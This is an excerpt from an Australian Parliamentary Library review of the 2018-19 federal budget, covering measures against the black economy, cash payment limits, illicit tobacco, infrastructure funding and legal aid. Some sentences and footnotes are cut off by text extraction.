$200,001* and over $56,007 plus 45 cents for each $1 over $200,000
(a) 37 cents in the dollar tier abolished and 32.5 cents in the dollar threshold raised to $200,000.
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and explanatory memorandum.
Budget Review 2018-19 38
Targeting the black economy Joseph Ayoub
The Black Economy Taskforce The Black Economy Taskforce (the Taskforce) is chaired by Michael Andrew AO (the current Chair of the Board of Taxation) and was established in December 2016 to develop a multi-pronged policy response to combat the black economy in Australia.159
The Taskforce provided the Black Economy Taskforce: final report—October 2017 (Final Report) to the Government in October 2017, which was publicly released with this year’s budget.160 The release was also accompanied by the Government’s response Tackling the Black Economy: Government Response to the Black Economy Taskforce Final Report (Government Response).161 The Final Report contains 80 recommendations which span the whole economy.162
What is the black economy? There is no internationally agreed definition of the black economy and definitions vary within Australia. According to the Taskforce it generally covers activities which take place outside the tax and regulatory systems involving both legal and illegal activities.163 Examples of black economy activity are listed in the adjacent box.164
What is the size of the black economy? In 2012, the Australian Bureau of Statistics (ABS) estimated that ‘underground production’ or the ‘cash economy’ accounted for 1.5% of Australia’s Gross Domestic Product (GDP).165 According to the Taskforce, this amounted to approximately $25 billion. Earlier this year KPMG estimated that the total, annual, aggregate tax gap including losses to Pay As You Go (PAYG) income tax, GST and self-assessed personal income tax to be $5.8 billion.166
159. The Treasury, ‘Black Economy Taskforce’, The Treasury website. 160. Black Economy Taskforce (Taskforce), Black Economy Taskforce: final report-October 2017, The Treasury, Canberra, October 2017. 161. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report, The
Treasury, May 2018. 162. Ibid., p.1; Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., pp. vii-xi. 163. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 12. 164. Ibid., pp. 12-18. 165. Australian Bureau of Statistics (ABS), The non-observed economy and Australia’s GDP, 2012: information paper,
cat. no. 5204.0.55.008, ABS, Canberra, 12 September 2013. 166. KPMG, The last frontier: shining a light on the black economy, KPMG, March 2018, p. 2.
Examples of black economy activities
⢠Not reporting or under-reporting income
⢠Paying for work cash-in-hand
⢠Underpayment of wages
⢠Sham contracting
⢠Phoenixing — when a new company is created to continue the business of a company that has been deliberately liquidated to avoid paying its debts
⢠Bypassing visa restrictions and visa fraud
⢠Identity fraud
⢠Australian Business Number (ABN) fraud
⢠GST fraud
⢠Origin of goods and duty fraud
⢠Duty evasion and illicit tobacco
⢠Tobacco excise evasion
⢠Money laundering
⢠Unregulated gambling
⢠Illegal and criminal activities
Budget Review 2018-19 39
In its Final Report the Taskforce stated that the black economy is larger than estimated by the ABS in 2012 and could be as large as 3% of GDP—in 2015-16 this equated to $50 billion.167 It is also likely that certain elements of the black economy are continuing to grow as a result of a combination of ‘strong incentives, poor transparency and limited enforcement’.168 Figure 1 shows the Taskforce’s estimation of the breakdown of black economy activity.
Figure 1: Partial indicators of black economy related activity (citations excluded)169
International experience In the Taskforce’s Black Economy Taskforce: interim report-March 2017 to Government, it estimates Australia’s black economy may be at the lower end of the range, close to the UK and Canada.170 However, this was based on the above ABS 2012 data which estimated that ‘underground production’ accounted for 1.5% of Australia’s GDP and on data collected by the Organisation for Economic Co-operation and Development (OECD) on the black economy in various countries (excluding Australia).
Based on the latest available OECD data and the Taskforce’s revised estimate of the black economy, the Parliamentary Library has produced Figure 2 which is an estimate of the size of Australia’s black economy compared to other OECD countries for 2015-16.
167. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 35. 168. Ibid. 169. Ibid., p. 36. The taskforce notes that the figures presented are not additive and should be taken as indicative only. 170. Taskforce, Black Economy Taskforce: interim report-March 2017, op. cit., p. 14.
Budget Review 2018-19 40
Figure 2: OECD comparison of Australia’s black economy
Note: this comparison is based on a 2011-12 survey by the OECD of participating countries. Australia was not included in the survey. The 2012 figure for Australia is based on the 2012 estimate by the ABS. This estimate was provided by the Taskforce in its Interim Report. The 2015-16 figure for Australia is based on the Taskforce’s estimate in its Final Report. Figure 2 should be interpreted with significant caution.
Source: OECD and ABS statistics 171
What drives the black economy? The Taskforce found that there are a range of drivers that interact with one another and ultimately lead to the decision to participate in the black economy.172 These drivers range from high tax and regulatory burdens through to changing business and technological landscapes. Other examples of drivers include:
⢠economic conditions and commercial pressures
⢠social norms which legitimise participation in the black economy
⢠availability, use and cost of cash
⢠inadequate knowledge about the system. 173
171. Estimates based on: OECD Statistics OECD (2014) The Non-Observed Economy in the System of National Accounts, OECD Statistics Brief, No. 18; Australian Bureau of Statistics (ABS), The non-observed economy and Australia’s GDP, 2012: information paper, op. cit.; Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 35.
172. Taskforce, Black Economy Taskforce: interim report-March 2017, op. cit., pp. 15-20. 173. Ibid.
Budget Review 2018-19 41
The Taskforce found that drivers can ‘offset or counter-balance each other’ and can either work to dissuade or encourage black economy participation.174 However, where the drivers encourage participation in the black economy, the Taskforce has observed the emergence of a ‘disturbing pattern’ in areas of public policy as outlined in the adjacent box.175
What are the consequences? Participation in the black economy produces both direct and indirect costs.176 The most immediate and obvious direct cost is the loss of taxation revenue and abuse of the welfare system — underreporting income enables a person to claim a benefit that they would otherwise not be entitled to. However, there are also a range of indirect costs including:
⢠harm suffered by individuals who are not within the relevant regulatory systems (such as workplace relations, immigration, occupational health and safety) because they are, for example, ‘off the books’
⢠by offering goods and services below the market value because, for example, payment is made in cash, the tax and regulatory costs are avoided. This provides the individual or business with a competitive advantage which penalises businesses and individuals who comply with their obligations
⢠if the community has a perception that the system is unfair or they lack confidence in the administration of system, this may result in their own participation in the black economy.177
The Taskforce considered that it is not realistic or cost effective to try to limit the costs entirely because ‘a number of black economy initiatives stem from basic design features of our tax and other systems’. An example given is the ‘tightly means-tested transfer systems’.178 However, ‘well-designed measures to counter the black economy can be expected to yield meaningful budgetary dividends over time’.179
Government response The Government has already begun to implement measures that arose out of recommendations in the Taskforce’s Interim Report - for example, the Treasury Laws Amendment (Black Economy Taskforce Measures No. 1) Bill 2018 criminalises the production, supply, use or possession of sales suppression technology and also extends the taxable payments reporting system to cleaning and courier businesses that have an ABN. The Fair Work Amendment (Protecting Vulnerable Workers) Bill 2017, among other things, introduced higher penalties for contravention of workplace laws.
Many of the Taskforce’s 80 recommendations addressed by the Government in its Response will be considered in the context of the Government’s existing policy review or processes.180 That said,
174. Ibid., p. 19. 175. Ibid., pp. 18-19. 176. Ibid., p 37. 177. Ibid., p. 37-38; Taskforce, Black Economy Taskforce: interim report-March 2017, op. cit., pp. 1, 11. 178. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 37. 179. Ibid. 180. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report,
op. cit., p. 14.
Development of black economy activity
Phase 1: there is an inherited policy, regulatory, and enforcement architecture which does not keep pace with economic, social or technological change.
Phase 2: some people exploit the regulatory gaps which have failed to keep pace with the above changes— when others see them ‘getting away with it’ they also move into the black
Budget Review 2018-19 42
the Government has expressed agreement or agreement in principle, with a number of measures. The measures that the Government disagreed with include:
⢠Recommendation 7.3—offer a time-limited amnesty for small businesses followed by an ‘enforcement blitz’.181
⢠Recommendation 10.2—change the alienation of personal services income rules and strengthen enforcement.182 Alienation of personal services income occurs when the services of an individual are provided through an interposed entity such as a company, trust or partnership, the profits of which are retained by that entity or diverted to associates in order to take advantage of a lower tax rate. It can also involve structuring in a particular way in order to take advantage of deductions which wouldn’t be available to an individual providing the same services as an employee.183
⢠Recommendation 13.3—examine the feasibility of introducing technology which marks cigarette packs and cases to show when excise has been correctly paid.184
Consistent with the Final Report, the Government acknowledges that it will need to address the root causes and drivers, while the current focus must be on the most urgent and costly problems.185
2018-19 Budget announcements The 2018—19 Budget builds on these measures and implements some of the Taskforce’s recommendations contained in the final report, including:
⢠an economy-wide limit of $10,000 for cash payments made to businesses for goods and services from 1 July 2019. (see separate Parliamentary Library brief: Black economy measures: limits on cash payments)
⢠a range of measures aimed at combatting the sale and production of illicit tobacco and to improve the collection of excise and customs duty on tobacco (see Parliamentary Library brief: Tobacco)
⢠expansion of the Taxable Payment Reporting System (TPRS) to:
- security providers and investigation services
- road freight transport
- computer system design and related services
⢠providing Treasury with $12.3 million over five years (with $1.7 million in 2022-23) to manage a whole of Government response to the Taskforce’s Final Report
⢠providing the ATO with $3.4 million over four years to lead a multi-agency Black Economy Standing Taskforce (the BEST). (see separate Parliamentary Library brief: Black economy standing taskforce)
⢠providing $318.5 million over four years to implement strategies including:
- establishing ATO ‘mobile strike teams’ and increasing the ATO ‘audit presence’
- establishing a black economy hotline which the public can use to report black economy activity including phoenix activities
181. Ibid., p. 20. 182. Ibid. p. 26. 183. Australian Taxation Office (ATO), ‘General anti-avoidance rules and PSI’, ATO website, last modified 30 March 2017. 184. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report,
op. cit., p. 35. 185. Ibid., p. 14.
Budget Review 2018-19 43
⢠providing the ATO with $9.2 million to develop a ‘Procurement Connected Policy’, initially requiring businesses seeking to tender for Australian Government procurement contracts over $4 million to provide a statement from the ATO that they are tax compliant
⢠removing certain deductions for those taxpayers who fail to comply with their Pay As You Go (PAYG) withholding obligations
⢠designing a new regulatory framework for the Australian Business Numbers (ABN) system
⢠a range of measures aimed at combating illegal phoenixing.
Financial impact The above measures include both revenue and expense measures. Figure 3 shows the total cost of the black economy and related measures announced in the 2018-19 Budget over the forward estimates. Based on the figures available in Budget Paper No. 2, it appears that the measures will produce a net gain of $4.6 billion over the forward estimates. This includes the measure to bring forward the payment of excise on all warehoused tobacco to 2019-20, and measures to combat illicit tobacco, which together is worth about $3.6 billion (see Parliamentary Library brief: Tobacco). When this measure is excluded the net gain is reduced to about $950 million over the forward estimates.186
Figure 3: total cost of 2018-19 Budget black economy and related measures
Source: Budget measures: budget paper no. 2: 2018-19
186. Australian Government, Budget measures: budget paper no.2: 2018-19, pp. 1-6, 47-68 and 194-199.
Budget Review 2018-19 44
Black Economy Standing Taskforce Joseph Ayoub
As discussed in the Parliamentary Library brief: Targeting the black economy, the Final Report of the Black Economy Taskforce (the Taskforce) made 80 recommendations to Government.187 Black Economy Package—new and enhanced ATO enforcement against the Black Economy188 and Black Economy Taskforce—Standing Taskforce189 implements recommendations 8.1 and 16.2 of the Taskforce—namely that the Government:
⢠implement a multi-pronged strategy to increase the level and visibility of enforcement and prosecutions, covering tax, industrial relations, welfare, immigration and financial regulatory compliance. The strategy needs to make better use of intelligence and be focused on problem areas.190
⢠establish a standing taskforce to identify, respond to and prosecute serious, complex black economy fraud.191
The Australian Taxation Office’s (ATO) current funding for compliance and audit activities for black economy activities is due to expire on 30 June 2018.192 The Government will provide the ATO with $3.5 million over four years from 2018-19 to lead a multi-agency Black Economy Standing Taskforce (BEST).193 This strategy is supported by the Government’s announcement that it will provide the ATO with an additional $318.5 million over four years from 2018-19 ‘to implement new strategies to combat the black economy’.194 According to the Budget announcement, this will involve establishing ‘mobile strike teams’ and increasing the ATO’s audit presence.195 This is part of the Government’s plan to ‘deliver more targeted, stronger and more visible enforcement’.196
According to the Taskforce, there is a community perception that it is currently ‘too easy to get away with’ participating in the black economy.197 The Final Report notes that businesses and individuals in regional areas may ‘not think that they will be subject to enforcement proceedings because they do not see a visible presence by major regulators in the area’.198 The Taskforce considered that increased publicity and presence can help change this perception.199
The Taskforce envisaged that the BEST would be modelled on the Serious Financial Crimes Taskforce and deal with serious, complex and high-value cases which require a cross-agency approach.200 Criminal behaviour in labour hire operations and pockets of entrenched labour exploitation are examples provided by the Taskforce.201 While it is not clear from the Budget announcement which agencies the ATO will be working with, the Taskforce noted that the ATO would work with the Australian Federal Police, the Australian Criminal Intelligence Commission, as
187. Black Economy Taskforce (Taskforce), Black Economy Taskforce: final report-October 2017, The Treasury, Canberra, October 2017, pp. vii-xi. 188. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 23. 189. Ibid., p. 181. 190. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., pp. 181-5. 191. Ibid., p. 337. 192. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 24. 193. Ibid., p. 181. 194. Ibid., p. 23. 195. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report, The
Treasury, May 2018, p. 10. 196. Ibid. 197. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 184. 198. Ibid., p. 178. 199. Ibid., p 184. 200. Ibid., p. 338. 201. Ibid., p. 337.
Budget Review 2018-19 45
well as relevant policy and regulatory agencies such as the Department of Home Affairs and the Fair Work Ombudsman.202
In recent times, the ATO has led and participated in a number of taskforces, including:
⢠Tax Avoidance Taskforce—which scrutinises the tax affairs of multinational enterprises, large public and private groups and wealthy individuals operating in Australia
⢠Phoenix Taskforce—a whole-of-government approach to combatting illegal phoenix activity, and
⢠Serious Financial Crimes Taskforce—a multi-agency taskforce targeting Serious Financial Crime in Australia which developed out of Project Wickenby.203.204 The Commissioner of Taxation responded to the first of the CETF’s reports Improving tax compliance in the cash economy by increasing the ATO’s staff presence in cash industries and developing Task Force initiatives.205 In its second report, also titled Improving tax compliance in the cash economy, the CETF found that there was ‘widespread acceptance in the community that not paying tax on cash income is OK’.206 The ATO also implemented an inter-agency cooperation program involving the Department of Social Services (Centrelink), Department of Immigration and Multicultural Affairs, and Department of Employment, Education and Training and Youth Affairs to facilitate joint case work and improve understanding of compliance activities.207
The Taskforce also noted that the Government will need to maintain a sustained focus on the implementation of the Final Report, something which in the Taskforce’s opinion has not happened with earlier black economy reviews.208 In this respect, the Government has also provided $12.3 million to Treasury over five years to ‘manage implementation of the whole-of-government response’ to the Final Report.209
As part of the Government’s response, a ‘Black Economy Hotline’ will be established.210 While suspicion of tax evasion can currently be reported both online and over the telephone,211 the Government considers that this hotline will allow the community to better report black economy and phoenix activity.212 Further, the hotline will be supported by new IT infrastructure so that information provided by the community can be converted into metadata to facilitate enforcement action.213 This appears to be consistent with the Taskforce’s statement that there is a need to
202. Ibid. 203. For further information, see Parliamentary Library brief: Tax integrity package—establishing the tax avoidance taskforce from the Parliamentary Library’s Budget review 2016-17.
204. B Pulle, ‘Budgeted Tax Revenue, the Cash (or Black or Underground) Economy and the Tax Gap’, Budget Review 1998-99, Parliamentary Library, Canberra, May 1998, p. 50. 205. Ibid. 206. Ibid. 207. Cash Economy Task Force. Improving tax compliance in the cash economy, Australian Taxation Office, Canberra, 1998,
pp. 10-11.
208. Ibid., p. 335 209. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 180. 210. Ibid., pp. 23-4. 211. ATO, ‘Report fraud, tax evasion, a tax planning scheme or unpaid super’, ATO website, last updated 20 February 2018. 212. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 24. 213. Ibid., p. 24.
Budget Review 2018-19 46
devote resources towards enforcement activities in more ‘efficient and smarter ways by making better use of data and focussing on problem areas’.214’.215 The Government has accepted this recommendation.216
It is expected that Black Economy Package—new and enhanced ATO enforcement against the Black Economy will have a net gain to the budget of $2.4 billion in fiscal balance terms over the forward estimates.217
214 Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 177. 215. Ibid., p. 272. 216. Australian Government, Tackling the Black Economy: Government Response to the Black Economy Taskforce Final Report, op cit., p. 29.
217. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 23.
Budget Review 2018-19 47
Black economy measures: limits on cash payments Joe Ayoub, Dr Jonathon Deans
As discussed in the Targeting the black economy article in Budget Review 2018-19, the final report of the Black Economy Taskforce (‘the Taskforce’) made 80 recommendations to the Government.218 Recommendation 3.1 of the final report was the adoption of a limit on cash payments for goods and services, which the Government accepted in its response, released on 8 May 2018.219
The recommendation has been included in the Budget as the Black Economy Package— introduction of an economy-wide cash payment limit measure.220.221
Prevalence of cash use Research published by the Reserve Bank of Australia (RBA) in July 2017 showed that cash accounted for 18 per cent of total merchant transactions (by value), falling to 11 per cent for payments of $501 or more.222.223 Non-compliance with taxation obligations enabled by the use of cash also provides businesses with an unfair competitive advantage by being able to offer to goods and services at a discount.224
Risks of cash use.225
218. Black Economy Taskforce, Black Economy Taskforce: final report, Commonwealth of Australia, October 2017. 219. Australian Government, Government response to the Black Economy Taskforce final report, 8 May 2018. 220. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 23. 221.). 222. Reserve Bank of Australia, How Australians pay: evidence from the 2016 Consumer Payments Survey, Supplementary Statistical Tables. 223. Black Economy Taskforce: final report, op. cit., p. 49. 224. Ibid., p. 53. 225. Ibid., p 55.
Budget Review 2018-19 48.226
A media report quoted the Minister for Revenue and Financial Services, Kelly O’Dwyer, as stating: ‘We’ve accepted $10,000 but we are interested in consultation around the figure as well’.227 The Taskforce’s final report noted that several countries in Europe have equivalent limits, including France, Italy, and Spain, and that the European Commission is exploring whether to adopt a limit across the European Union.228 A 2017 study by researchers at Harvard University and the Royal United Services Institute identified Jamaica, Mexico, Uruguay, and India as also having limits on cash transactions.229 That study found that limits ‘represent a practical and relatively low-risk policy tool to tackle’ money laundering and tax evasion, with ‘very limited downsides … in terms of the impact on legitimate economic activity’.230
A separate media report identified industries which may be affected as including real estate, vehicle sales, and horticultural farming.
226. Ibid., pp. 56-57. 227. J Mather, ‘Government binned cash amnesty idea’, Australian Financial Review, 11 May 2018, p. 8. 228. Black Economy Taskforce: final report, op. cit., p. 55. 229. 230. Ibid., p. 35.
Budget Review 2018-19 49
Tobacco Ph.231.232
However, the tobacco-related measures that have a material impact on the Budget do not concern illicit tobacco per se, but concern changes in the timing of the collection of excise on legally imported tobacco.
Imposing duty on imported tobacco earlier in the supply chain.233
From 1 July 2019, customs duty will apply to tobacco products as soon they are imported, removing the ability of tobacco importers to defer taxation using warehousing arrangements.234 The Taskforce recommended this approach in order to minimise the opportunity for duty to be avoided by distributing tobacco from warehouses illicitly, prior to the imposition of tax.235
Taxing tobacco warehoused on 1 June 2019.
Other related measures The package includes several other measures:
⢠from 1 July 2018, creating a cross-agency Illicit Tobacco Task Force (ITTF) to allow for enhanced cooperation in tackling illicit tobacco trade and prosecuting organised crime groups. The new Task Force, which builds on the approach of the Australian Border Force Tobacco Strike Team, will have additional powers and capabilities to enhance intelligence gathering and proactively target, disrupt and prosecute serious and organised crime groups at the centre of the illicit tobacco trade.236
231. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 12; Australian Government, Black Economy Taskforce: Final report, Treasury, October 2017. 232 Ibid., p. 30 233. Department of Home Affairs (Home Affairs), ‘Warehouses and depots’, Home Affairs website. 234. For explanatory material, see Australian Taxation Office (ATO), ‘Excise equivalent goods (imports)’, ATO website. 235. Australian Government, Black Economy Taskforce: Final report , op. cit., p. 311. 236 Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 12.
Budget Review 2018-19 50
- The existing Black Economy Taskforce recommended that the ITTF comprise the Australian Tax Office, Australian Federal Police, Department of Home Affairs, the Australian Criminal Intelligence Commission and the Department of Health.237
⢠providing additional resources to the ATO to detect and destroy domestically grown illicit tobacco crops
⢠making manufactured tobacco products a restricted import from 1 July 2019, requiring a permit from the Department of Home Affairs to import them and
⢠upgrading the ATO’s payment systems infrastructure for customs duties.
These policies will complement the previously announced measures to combat illicit tobacco.238.
Financial impact:
⢠Applying customs duties to tobacco products already stored within warehouses. This has the effect of bringing forward tobacco tax revenue that would have otherwise been paid in future years. This component is expected to have a one-off financial impact in 2019-20.
⢠Additional revenue from reducing tax avoidance through the illicit trade in tobacco. This component is expected to have an ongoing financial impact.
Table 1: Financial impact of the ‘Black Economy Package - combatting illicit tobacco’
(.
237. Ibid., p. 309. 238 For example, see Australian Government, Budget measures: budget paper no. 2: 2016-17, p. 16; ‘Tobacco Excise — measures to improve health outcomes and combat illicit tobacco’
Budget Review 2018-19 51
Infrastructure expenditure Ad’.239 Budget paper No 1 clarifies that this figure accounts for the period from 2018-19 until 2027-28.240 This announcement builds on statements made in the 2017-18 Budget in which the Treasurer stated the Government had increased total funding and financing to transportation infrastructure to $70 billion over the years 2013-14 to 2020-21241 and projected the delivery of $75 billion in infrastructure funding and financing from 2017-18 to 2026-27.242
The Government states that of the $75 billion package in 2018-19, $24.5 billion is to be funded in 2018-19.243 This was clarified by ‘Treasury and Infrastructure department officials’ as being $4.2 billion on new projects and $17.8 billion to fund existing projects between 2018-19 and 2021-22.244.’245 Also, Infrastructure Partnerships Australia (IPA) said ‘Tonight’s Federal Budget sees infrastructure funding reduced by $2 billion over the forward estimates, meaning less cash for projects and more congestion for commuters’.246 Similar issues were raised in relation to the claims made in the 2017-18 Budget with the Opposition spokesperson questioning the total and claiming that spending was declining.247
This Brief outlines some of the funding mechanisms for infrastructure; in particular, payments to the states and the use of new funding mechanisms and challenges that hinder the reconciliation of the different claims on infrastructure spending.
Payments to the states and territories.248 These payments are summarised annually in Budget Paper No. 3, Federal Financial Relations. The federal financial relations document also summarises untied local road payments to local governments.
239. Australian Government, Budget speech 2018-19. 240. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 1, p. 1-18. 241. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 1, p. 1-1. 242. Ibid., p. 1-11. 243. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 1, p. 1-18. 244. P Karp, ‘Roads get $4.5bn in Australia budget but rail spending forced to wait’, The Guardian, 8 May 2018. 245. A Albanese (Shadow Minister for Infrastructure, Transport, Cities and Regional Development), Infrastructure con job laid bare
in budget fine print, media release, 9 May 2018. 246. Infrastructure Partnerships Australia, Feds warm infrastructure narrative has not been met by cold hard cash, media release, May 2018. 247. A Albanese (Shadow Minister for Infrastructure, Transport, Cities and Regional Development), Turnbull avoids truth about his big cuts to
infrastructure investment, 10 May 2017.
248. See, the Council on Federal Financial Relations,.
Budget Review 2018-19 52
The payments to and through the states are dispersed based on certain programs, which for 2018-19 includes:
⢠The Infrastructure Investment Program: covering Black Spot Projects, the Bridges Renewal
Program, Developing Northern Australia—including Improving Cattle Supply Chains and Northern Australia Roads, the Heavy Vehicle Safety and Productivity Program, the Major Projects Business Case Fund, the National Rail Program—including a rail and road component, Roads of Strategic Importance, Roads to Recovery and the Urban Congestion Initiative.
⢠The Infrastructure Growth Package: covering the Asset Recycling Initiative, ‘new investments’,
Interstate Road Transport and the Western Sydney Infrastructure Plan.
⢠A range of other infrastructure, including for example the Launceston City Deal-Tamar River,
Murray-Darling Basin Regional Economic Diversification Program, Supporting Drought-Affected Communities Program, Western Sydney City Deal and WiFi and Mobile Coverage on Trains..249
Over the period from 2014-15 to 2017-18 the payments total $29.5 billion, and over the period from 2018-19 to 2021-22 the expected payments total $24.3 billion, for a total of $53.8 billion.250.251 This reduction appears to be what Infrastructure Partnerships Australia are referring to in their commentary noted above, and highlighted by the Opposition spokesperson in media commentary.252
249. Some minor one-off payments such as ‘Supplementary funding to South Australia for local roads’ are excluded. This measure accounts for $40 million over 2017-18 and 2018-19. 250. Assuming the estimated actual figure is representative of the actual expenditure in the year prior to a Budget year, based on Australian Government, Federal financial relations: budget paper no.3, for the years 2013-14 until 2018-19, typically Table
2.9.
251. Australian Government, Federal financial relations: budget paper no.3: 2018-19, Table 2.9, p 45. 252. A Albanese (Shadow Minister for Infrastructure, Transport, Cities and Regional Development), Transcript of television interview: Sky News with Samantha Maiden: 10 May 2018: by-elections, mayo preselection, citizenship, single parent families, boat turnbacks, ALP National Conference, media release, 10 May 2018
Budget Review 2018-19 53
Figure 1: Infrastructure payments to other levels of Government
There is no obvious explanation for the reduction in funding, with almost all components of the three program groups outlined above declining.
Funding mechanisms Over time new funding mechanisms have been used by the Commonwealth to support infrastructure projects, beyond traditional transfers to the states.253 These mechanisms include:
ï§ Equity investments: akin to buying shares in a business, the use of which provides direct control over a project’s delivery and financing risks, and allows for potential future returns from profitable investments. For example, the 2017-18 Budget included an equity commitment of $8.4 billion in the Australian Rail Track Corporation Pty Ltd to deliver inland rail. 254
ï§ Concessional loans: which provide a financing option to projects based on a lower interest rate or longer time frame than might be available in private markets. For example the 2017-18 Budget discussed a $2 billion concessional loan for the WestConnex project. 255
ï§ Guarantees: where the Commonwealth accepts responsibility for defined risk events that would provide an incentive for private investors to invest. For example, the 2018-19 Budget outlines an indemnity given to the Moorebank Intermodal Company Limited (MIC) ‘…to cover all costs and liabilities that may be incurred by MIC in the event that the Commonwealth terminates the Equity Funding Agreement between the Commonwealth and MIC’.
256
ï§ Creating funding pools: attributing a pool of resources that can be drawn upon for a range of related purposes. For example, the 2017-18 Budget outlined the $5 billion Northern Australia Infrastructure Facility. 257
It is also feasible that some major projects could receive support by a combination of these mechanisms in hybrid form to manage more complex risks and financing requirements.
The use of these mechanisms introduces comparability and counting challenges.
253. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 4, p. 4-13. 254. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 4, p. 4-9. 255. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 3, p. 3-13. 256. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 9, pp.9-15. 257. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 3, p. 3-13.
Budget Review 2018-19 54’.258.259.
Projects in the total count The Parliamentary Library has not been able to identify project commitments in the Budget documents that equal the Government’s $75 billion total. The various documents published by the Government and the Department of Infrastructure, Regional Development and Cities provide only partial information:
⢠In Budget Paper 2, Part 2: Expense Measures identifies $116 million in infrastructure spending in 2018-19, with an additional $246 million over the forward estimates.260 In Budget Paper 3, Table 2.9 identifies $6.3 billion in infrastructure payments to the states in 2018-19, with an additional $15.1 billion over the forward estimates.261
⢠A Budget press release from the Minister for Infrastructure and Transport identifies $5.0 billion in Commonwealth spending in 2018-19 on projects with a total Commonwealth contribution of $35.4 billion.262 This list excludes a number of programs, such as the Black Spot Projects, Bridges Renewal Program, and Roads to Recovery, as well as projects funded through equity (such as Snowy Hydro and Western Sydney Airport) and special funds (such as the Northern Australia Infrastructure Facility and the National Water Infrastructure Lending Facility). Projects which do not receive funding in 2018-19 are also excluded.
⢠A list of current major projects from the Department identifies $9.7 billion in Commonwealth spending from 2018-19 onwards, with a total contribution of $29.7 billion.263 A number of initiatives are excluded, including projects which do not receive funding in 2018-19.
⢠A 10 Year Infrastructure Investment Pipeline list from the Department identifies $24.6 billion of Commonwealth spending.264 It appears that this list includes funding provided in the 2018-19 Budget and is not completely additional to the list of major projects already underway. As funding detail is not provided, it is not possible to determine how these lists interact or the total amount of infrastructure investment.
258. P Fletcher (Minister for Urban Infrastructure) and D Chester (Minister for Infrastructure and Transport), 2017-18 Budget papers reveal record spending on infrastructure, media release, 11 May 2017.
259. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 9, pp.9-8 and 9-33 to 9-34. 260. Australian Government, Budget strategy and outlook: budget paper no. 2: 2018-19, Part 2, pp. 136-149. 261. Australian Government, Budget strategy and outlook: budget paper no. 3: 2018-19, Part 2, p. 45. 262. M McCormack (Deputy Prime Minister and Minister for Infrastructure and Transport), 2018-19 Budget-Infrastructure:
busting congestion, connecting our regions, improving safety and creating jobs, ministerial budget statement, 2018. 263. Australian Government, Strengthening Australia’s cities and regions, p. 32. 264. Australian Government, Strengthening Australia’s cities and regions, p. 4.
Budget Review 2018-19 55
The Parliamentary Library has been unable to locate any public document which provides a transparent overview of total infrastructure commitments. This difficulty is not new. In the 2017- 18 Federal Budget the Treasurer claimed $75 billion in infrastructure spending over 10 years.265 The Parliamentary Library was unable to corroborate this figure and the Department later identified $78.7 billion in infrastructure spending over 10 years in Senate Estimates.266 The Department may again provide new information about infrastructure spending commitments in Estimates hearings on the 2018-19 Budget.
A summary of the different presentations of total infrastructure expenditure reported outside of the Budget documents is in Annex A.
Concluding comments.’267 This appears to remain the case in 2018-19, with spending split between traditional payments to the states, various new financing mechanisms and the use of contingent commitments that do not attach to actual payments.
265. S Morrison (Treasurer), Budget Speech 2017-18. 266. Senate Rural and Regional Affairs and Transport Legislation Committee, Answers to Questions on Notice, Infrastructure and Regional Development Portfolio, Budget Estimates 2017-18, Question 26, accessed 16 May 2018. 267. Infrastructure Australia, Australian Infrastructure Plan, 2016, p 23.
Budget Review 2018-19 56
ANNEX A: References to infrastructure expenditure in related documents Reference Source Timeframe reported
No
timeframe 2013-14 to 2021-22
2018-19 2018-19
onwards 2018-19 to 2026-27
$m $m $m $m $m
10 Year Infrastructure Pipeline a — — — — 24 582.6
Map of Pipeline projects
b 24 181.6 — — — —
Current Major Projects c 29 727.7* — — 9 744.6 —
Budget 2018-19: Key Projects** d — 35 425.6 5 035.17 — —
Busting Congestion. Connecting our regions. Improving Safety***
e 56 999 — — — —.
Budget Review 2018-19 57
Legal aid and legal assistance services Michele Brennan and Jaan Murphy
Legal aid services: Commonwealth funded legal services are delivered by state and territory legal aid commissions through the National Partnership Agreement on Legal Assistance Services (NPALAS) and the Expensive Commonwealth Criminal Cases Fund (ECCCF).
Legal assistance services: all of the sector-wide legal service providers, including legal aid commissions, community legal centres (CLCs), Aboriginal and Torres Strait Islander legal services (ATSILS) and family violence prevention legal services.
Commonwealth funding for legal assistance services Most of the funding provided by the Australian Government to support the delivery of legal assistance services to disadvantaged Australians is provided through the National Partnership Agreement on Legal Assistance Services (NPALAS). The current NPALAS commenced on 1 July 2015 and expires on 30 June 2020.268 Unlike its predecessor, which only covered legal aid services, the current NPALAS also provides funding for community legal centres (CLCs).269
In 2018-19 the Australian Government will provide $265.9 million funding for legal aid services and CLCs through the NPALAS.270 This is an increase of $4.4 million from 2017-18. Funding will then increase by $4.1 million in 2019-20 to $270 million. The forward estimates only indicate
funding to 2019-20 as the NPALAS is due to expire on 30 June 2020.271
This funding is consistent with the 2017-18 Budget, but reflects an increase on the funding in the NPALAS as originally agreed. This is discussed below.
